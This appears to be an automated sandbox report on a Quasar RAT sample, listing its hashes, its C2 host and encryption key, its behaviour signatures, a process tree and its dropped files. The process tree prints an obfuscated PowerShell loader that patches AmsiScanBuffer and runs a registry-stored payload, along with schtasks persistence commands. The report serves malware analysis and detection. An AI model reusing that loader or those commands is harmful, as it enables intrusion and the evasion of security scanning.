Analysis

  • max time kernel
    150s
  • max time network
    135s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    02-05-2024 20:58

General

  • Target

    R0X-Built.exe

  • Size

    409KB

  • MD5

    a0f5aa5764c4f66eee82f857f9f447b6

  • SHA1

    3c3a780d020cb3eb3088223443fe813abb95dccd

  • SHA256

    43c6b9b6c241dbd6ad1bde7980026235373374d5e836fb6c794354a15e678ef3

  • SHA512

    458c03ae490e409598b8e9e89911b0757fb61411fbc45a60ecefed3c13d0fc96b7bc205afe1fb3e0f7585eb163f102754ec9259691eca1bfa00b028f74eb8384

  • SSDEEP

    6144:RMX2pJAJcC0B61K6qZ1fQ57P/EwXhb4azmosb+lfXdOIFyoOOfTA3pwF:lpyJcC+uK6qZ1G8QJjbfNOSOObA3pwF

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

Slave

C2

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-3vDee7FzoJnhqjuE3n

Attributes
  • encryption_key

    KaNwItdY6wlv5nCN4prL

  • install_name

    $srr-powershell.exe

  • log_directory

    Logs

  • reconnect_delay

    1000

  • startup_key

    $srr-powershell

  • subdirectory

    Windows

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 7 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 57 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:588
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:1008
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{db1b133a-95de-4d86-9523-3a73d5ad5f9b}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2612
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:640
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
          1⤵
            PID:740
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
            1⤵
              PID:904
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
              1⤵
                PID:372
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                1⤵
                  PID:364
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
                  1⤵
                    PID:560
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
                    1⤵
                      PID:1052
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                        PID:1108
                        • c:\windows\system32\taskhostw.exe
                          taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                          2⤵
                            PID:3048
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:mvSTmrtpdXoW{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EUgPqqPxZidrCN,[Parameter(Position=1)][Type]$GrwCvqPdVw)$jxOVHyCXjIX=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+'e'+[Char](99)+'te'+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+'e'+''+[Char](109)+''+'o'+'r'+[Char](121)+''+[Char](77)+'o'+'d'+'ule',$False).DefineType(''+'M'+'y'+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+'e'+'','Cla'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+'S'+'e'+'a'+''+[Char](108)+''+[Char](101)+''+'d'+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+'iC'+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+'C'+'l'+[Char](97)+'s'+'s'+'',[MulticastDelegate]);$jxOVHyCXjIX.DefineConstructor(''+'R'+'T'+[Char](83)+'p'+'e'+''+'c'+'i'+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+','+'H'+'ide'+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+'g'+[Char](44)+''+'P'+'ub'+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$EUgPqqPxZidrCN).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+[Char](105)+''+'m'+''+'e'+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');$jxOVHyCXjIX.DefineMethod(''+'I'+'n'+'v'+''+'o'+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'N'+[Char](101)+''+'w'+'Sl'+'o'+''+[Char](116)+',Vir'+'t'+''+'u'+''+[Char](97)+''+[Char](108)+'',$GrwCvqPdVw,$EUgPqqPxZidrCN).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e,'+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $jxOVHyCXjIX.CreateType();}$oUxxOyTYhFKVB=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+''+[Char](46)+'dl'+[Char](108)+'')}).GetType('M'+[Char](105)+'c'+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+'f'+'t'+'.'+[Char](87)+''+'i'+''+[Char](110)+'3'+'2'+''+[Char](46)+''+[Char](85)+''+'n'+''+'s'+''+'a'+'f'+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+'i'+'v'+'e'+[Char](77)+''+[Char](101)+'t'+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$YdNoYRQjDixXWe=$oUxxOyTYhFKVB.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+'P'+''+[Char](114)+'o'+[Char](99)+'Add'+[Char](114)+''+[Char](101)+''+'s'+''+'s'+'',[Reflection.BindingFlags]('P'+'u'+''+[Char](98)+'l'+'i'+''+[Char](99)+''+[Char](44)+'S'+[Char](116)+'a'+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$BbIkBNfDsyBuFiDrUpH=mvSTmrtpdXoW @([String])([IntPtr]);$NZVHnyEBdpJKgYVYkpDccz=mvSTmrtpdXoW @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$BinObarFItT=$oUxxOyTYhFKVB.GetMethod(''+[Char](71)+'e'+[Char](116)+'Mo'+[Char](100)+''+'u'+''+'l'+''+[Char](101)+'H'+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+'r'+'n'+''+'e'+'l'+'3'+''+'2'+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')));$cMnrdXvvepBbMn=$YdNoYRQjDixXWe.Invoke($Null,@([Object]$BinObarFItT,[Object](''+[Char](76)+'o'+[Char](97)+''+'d'+''+[Char](76)+''+'i'+''+[Char](98)+'r'+[Char](97)+'r'+[Char](121)+''+'A'+'')));$FXGFiHzyDpEDorcee=$YdNoYRQjDixXWe.Invoke($Null,@([Object]$BinObarFItT,[Object](''+[Char](86)+''+[Char](105)+''+'r'+'t'+[Char](117)+''+'a'+''+[Char](108)+'P'+'r'+'o'+'t'+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$CiJNDCm=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cMnrdXvvepBbMn,$BbIkBNfDsyBuFiDrUpH).Invoke(''+'a'+''+[Char](109)+'s'+'i'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$qUwUsOfBSUcGRivgG=$YdNoYRQjDixXWe.Invoke($Null,@([Object]$CiJNDCm,[Object]('A'+[Char](109)+''+[Char](115)+''+'i'+''+[Char](83)+'c'+[Char](97)+''+'n'+''+[Char](66)+''+'u'+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$kkGQorNbKI=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FXGFiHzyDpEDorcee,$NZVHnyEBdpJKgYVYkpDccz).Invoke($qUwUsOfBSUcGRivgG,[uint32]8,4,[ref]$kkGQorNbKI);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$qUwUsOfBSUcGRivgG,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FXGFiHzyDpEDorcee,$NZVHnyEBdpJKgYVYkpDccz).Invoke($qUwUsOfBSUcGRivgG,[uint32]8,0x20,[ref]$kkGQorNbKI);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'OF'+[Char](84)+''+'W'+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+[Char](116)+''+[Char](97)+'g'+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                            2⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Drops file in System32 directory
                            • Suspicious use of SetThreadContext
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:3516
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                          1⤵
                            PID:1184
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k localservice -s nsi
                            1⤵
                              PID:1204
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k netsvcs -s Themes
                              1⤵
                                PID:1248
                              • c:\windows\system32\svchost.exe
                                c:\windows\system32\svchost.exe -k localservice -s EventSystem
                                1⤵
                                  PID:1256
                                • c:\windows\system32\svchost.exe
                                  c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
                                  1⤵
                                    PID:1400
                                  • c:\windows\system32\svchost.exe
                                    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                    1⤵
                                      PID:1428
                                      • c:\windows\system32\sihost.exe
                                        sihost.exe
                                        2⤵
                                          PID:2924
                                      • c:\windows\system32\svchost.exe
                                        c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                        1⤵
                                          PID:1460
                                        • c:\windows\system32\svchost.exe
                                          c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
                                          1⤵
                                            PID:1544
                                          • c:\windows\system32\svchost.exe
                                            c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
                                            1⤵
                                              PID:1552
                                            • c:\windows\system32\svchost.exe
                                              c:\windows\system32\svchost.exe -k networkservice -s Dnscache
                                              1⤵
                                                PID:1596
                                              • c:\windows\system32\svchost.exe
                                                c:\windows\system32\svchost.exe -k localservice -s netprofm
                                                1⤵
                                                  PID:1672
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                                  1⤵
                                                    PID:1692
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                                    1⤵
                                                      PID:1832
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
                                                      1⤵
                                                        PID:1848
                                                      • c:\windows\system32\svchost.exe
                                                        c:\windows\system32\svchost.exe -k appmodel -s StateRepository
                                                        1⤵
                                                          PID:1924
                                                        • c:\windows\system32\svchost.exe
                                                          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                          1⤵
                                                            PID:1936
                                                          • C:\Windows\System32\spoolsv.exe
                                                            C:\Windows\System32\spoolsv.exe
                                                            1⤵
                                                              PID:2020
                                                            • c:\windows\system32\svchost.exe
                                                              c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
                                                              1⤵
                                                                PID:1572
                                                              • c:\windows\system32\svchost.exe
                                                                c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
                                                                1⤵
                                                                  PID:2224
                                                                • c:\windows\system32\svchost.exe
                                                                  c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
                                                                  1⤵
                                                                  • Drops file in System32 directory
                                                                  PID:2324
                                                                • c:\windows\system32\svchost.exe
                                                                  c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                  1⤵
                                                                    PID:2336
                                                                  • c:\windows\system32\svchost.exe
                                                                    c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                    1⤵
                                                                      PID:2352
                                                                    • c:\windows\system32\svchost.exe
                                                                      c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
                                                                      1⤵
                                                                        PID:2368
                                                                      • C:\Windows\sysmon.exe
                                                                        C:\Windows\sysmon.exe
                                                                        1⤵
                                                                          PID:2452
                                                                        • c:\windows\system32\svchost.exe
                                                                          c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
                                                                          1⤵
                                                                            PID:2460
                                                                          • c:\windows\system32\svchost.exe
                                                                            c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                                            1⤵
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:2468
                                                                          • c:\windows\system32\svchost.exe
                                                                            c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                            1⤵
                                                                              PID:2476
                                                                            • c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                              1⤵
                                                                                PID:2804
                                                                              • c:\windows\system32\svchost.exe
                                                                                c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
                                                                                1⤵
                                                                                  PID:2956
                                                                                • C:\Windows\system32\wbem\unsecapp.exe
                                                                                  C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                  1⤵
                                                                                    PID:2992
                                                                                  • c:\windows\system32\svchost.exe
                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
                                                                                    1⤵
                                                                                      PID:3080
                                                                                    • C:\Windows\Explorer.EXE
                                                                                      C:\Windows\Explorer.EXE
                                                                                      1⤵
                                                                                        PID:3324
                                                                                        • C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe"
                                                                                          2⤵
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:2272
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe" /rl HIGHEST /f
                                                                                            3⤵
                                                                                            • Creates scheduled task(s)
                                                                                            PID:3260
                                                                                          • C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:4580
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe" /rl HIGHEST /f
                                                                                              4⤵
                                                                                              • Creates scheduled task(s)
                                                                                              PID:512
                                                                                          • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:1892
                                                                                          • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                            "SCHTASKS.exe" /create /tn "$77R0X-Built.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe'" /sc onlogon /rl HIGHEST
                                                                                            3⤵
                                                                                            • Creates scheduled task(s)
                                                                                            PID:4216
                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                        1⤵
                                                                                          PID:3852
                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                          1⤵
                                                                                            PID:4052
                                                                                          • c:\windows\system32\svchost.exe
                                                                                            c:\windows\system32\svchost.exe -k localservice -s CDPSvc
                                                                                            1⤵
                                                                                              PID:4728
                                                                                            • c:\windows\system32\svchost.exe
                                                                                              c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
                                                                                              1⤵
                                                                                                PID:5064
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
                                                                                                1⤵
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:3512
                                                                                              • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                1⤵
                                                                                                • Drops file in System32 directory
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:3008
                                                                                              • c:\windows\system32\svchost.exe
                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
                                                                                                1⤵
                                                                                                  PID:4040
                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                  1⤵
                                                                                                    PID:4484
                                                                                                  • C:\Windows\system32\ApplicationFrameHost.exe
                                                                                                    C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                                                                                    1⤵
                                                                                                      PID:4584
                                                                                                    • C:\Windows\System32\InstallAgent.exe
                                                                                                      C:\Windows\System32\InstallAgent.exe -Embedding
                                                                                                      1⤵
                                                                                                        PID:2552
                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                        1⤵
                                                                                                          PID:5036
                                                                                                        • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                          C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                          1⤵
                                                                                                          • Checks BIOS information in registry
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          PID:3528

                                                                                                        Network

                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                        Replay Monitor

                                                                                                        Loading Replay Monitor...

                                                                                                        Downloads

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                          Filesize

                                                                                                          162KB

                                                                                                          MD5

                                                                                                          152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                          SHA1

                                                                                                          c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                          SHA256

                                                                                                          a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                          SHA512

                                                                                                          2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                        • C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe
                                                                                                          Filesize

                                                                                                          409KB

                                                                                                          MD5

                                                                                                          a0f5aa5764c4f66eee82f857f9f447b6

                                                                                                          SHA1

                                                                                                          3c3a780d020cb3eb3088223443fe813abb95dccd

                                                                                                          SHA256

                                                                                                          43c6b9b6c241dbd6ad1bde7980026235373374d5e836fb6c794354a15e678ef3

                                                                                                          SHA512

                                                                                                          458c03ae490e409598b8e9e89911b0757fb61411fbc45a60ecefed3c13d0fc96b7bc205afe1fb3e0f7585eb163f102754ec9259691eca1bfa00b028f74eb8384

                                                                                                        • C:\Windows\Temp\__PSScriptPolicyTest_zpuc1cb2.b4f.ps1
                                                                                                          Filesize

                                                                                                          1B

                                                                                                          MD5

                                                                                                          c4ca4238a0b923820dcc509a6f75849b

                                                                                                          SHA1

                                                                                                          356a192b7913b04c54574d18c28d46e6395428ab

                                                                                                          SHA256

                                                                                                          6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                                                          SHA512

                                                                                                          4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                                                                        • C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
                                                                                                          Filesize

                                                                                                          338B

                                                                                                          MD5

                                                                                                          f633337723b377ea951c1541f6ef5914

                                                                                                          SHA1

                                                                                                          c4c3eaa0449abff4faea75a27a9dad517132fc61

                                                                                                          SHA256

                                                                                                          dfe3ea3fec828cd2666419d124e2306a1a1a8805fa87bc46644c7882c7558da1

                                                                                                          SHA512

                                                                                                          66e254391220cb990146ff1f20fcb20c20059f2381132888a032c51de3c89ff8a15991e37d7e4fd58b1fa002176f3dd100c78bc96dcb9907d6e9b433ab5fd3f3

                                                                                                        • memory/588-72-0x0000015EA69E0000-0x0000015EA6A0B000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/588-73-0x00007FFA70AD0000-0x00007FFA70AE0000-memory.dmp
                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/588-66-0x0000015EA69E0000-0x0000015EA6A0B000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/588-65-0x0000015EA69E0000-0x0000015EA6A0B000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/588-64-0x0000015EA69B0000-0x0000015EA69D5000-memory.dmp
                                                                                                          Filesize

                                                                                                          148KB

                                                                                                        • memory/640-77-0x000001CA78230000-0x000001CA7825B000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/640-84-0x00007FFA70AD0000-0x00007FFA70AE0000-memory.dmp
                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/640-83-0x000001CA78230000-0x000001CA7825B000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/740-94-0x00000176FD200000-0x00000176FD22B000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/740-95-0x00007FFA70AD0000-0x00007FFA70AE0000-memory.dmp
                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/740-88-0x00000176FD200000-0x00000176FD22B000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/904-99-0x00000210DC6E0000-0x00000210DC70B000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/904-105-0x00000210DC6E0000-0x00000210DC70B000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/904-106-0x00007FFA70AD0000-0x00007FFA70AE0000-memory.dmp
                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/1008-110-0x000001CC1C6F0000-0x000001CC1C71B000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/2272-6-0x0000000006450000-0x0000000006462000-memory.dmp
                                                                                                          Filesize

                                                                                                          72KB

                                                                                                        • memory/2272-5-0x0000000005850000-0x00000000058B6000-memory.dmp
                                                                                                          Filesize

                                                                                                          408KB

                                                                                                        • memory/2272-1-0x0000000000F00000-0x0000000000F6C000-memory.dmp
                                                                                                          Filesize

                                                                                                          432KB

                                                                                                        • memory/2272-20-0x0000000073C20000-0x000000007430E000-memory.dmp
                                                                                                          Filesize

                                                                                                          6.9MB

                                                                                                        • memory/2272-7-0x0000000006840000-0x000000000687E000-memory.dmp
                                                                                                          Filesize

                                                                                                          248KB

                                                                                                        • memory/2272-2-0x0000000005D50000-0x000000000624E000-memory.dmp
                                                                                                          Filesize

                                                                                                          5.0MB

                                                                                                        • memory/2272-3-0x00000000058F0000-0x0000000005982000-memory.dmp
                                                                                                          Filesize

                                                                                                          584KB

                                                                                                        • memory/2272-0-0x0000000073C2E000-0x0000000073C2F000-memory.dmp
                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/2272-4-0x0000000073C20000-0x000000007430E000-memory.dmp
                                                                                                          Filesize

                                                                                                          6.9MB

                                                                                                        • memory/2612-50-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/2612-59-0x00007FFAB0A40000-0x00007FFAB0C1B000-memory.dmp
                                                                                                          Filesize

                                                                                                          1.9MB

                                                                                                        • memory/2612-61-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/2612-60-0x00007FFAAE820000-0x00007FFAAE8CE000-memory.dmp
                                                                                                          Filesize

                                                                                                          696KB

                                                                                                        • memory/2612-53-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/2612-55-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/2612-51-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/2612-52-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/3516-47-0x000001C7BDD90000-0x000001C7BDDBA000-memory.dmp
                                                                                                          Filesize

                                                                                                          168KB

                                                                                                        • memory/3516-49-0x00007FFAAE820000-0x00007FFAAE8CE000-memory.dmp
                                                                                                          Filesize

                                                                                                          696KB

                                                                                                        • memory/3516-28-0x000001C7BDC10000-0x000001C7BDC86000-memory.dmp
                                                                                                          Filesize

                                                                                                          472KB

                                                                                                        • memory/3516-25-0x000001C7BDA60000-0x000001C7BDA82000-memory.dmp
                                                                                                          Filesize

                                                                                                          136KB

                                                                                                        • memory/3516-48-0x00007FFAB0A40000-0x00007FFAB0C1B000-memory.dmp
                                                                                                          Filesize

                                                                                                          1.9MB

                                                                                                        • memory/4580-44-0x0000000006690000-0x000000000669A000-memory.dmp
                                                                                                          Filesize

                                                                                                          40KB

                                                                                                        • memory/4580-14-0x0000000073C20000-0x000000007430E000-memory.dmp
                                                                                                          Filesize

                                                                                                          6.9MB

                                                                                                        • memory/4580-13-0x0000000073C20000-0x000000007430E000-memory.dmp
                                                                                                          Filesize

                                                                                                          6.9MB

                                                                                                        • memory/4580-671-0x0000000073C20000-0x000000007430E000-memory.dmp
                                                                                                          Filesize

                                                                                                          6.9MB

                                                                                                        • memory/4580-672-0x0000000073C20000-0x000000007430E000-memory.dmp
                                                                                                          Filesize

                                                                                                          6.9MB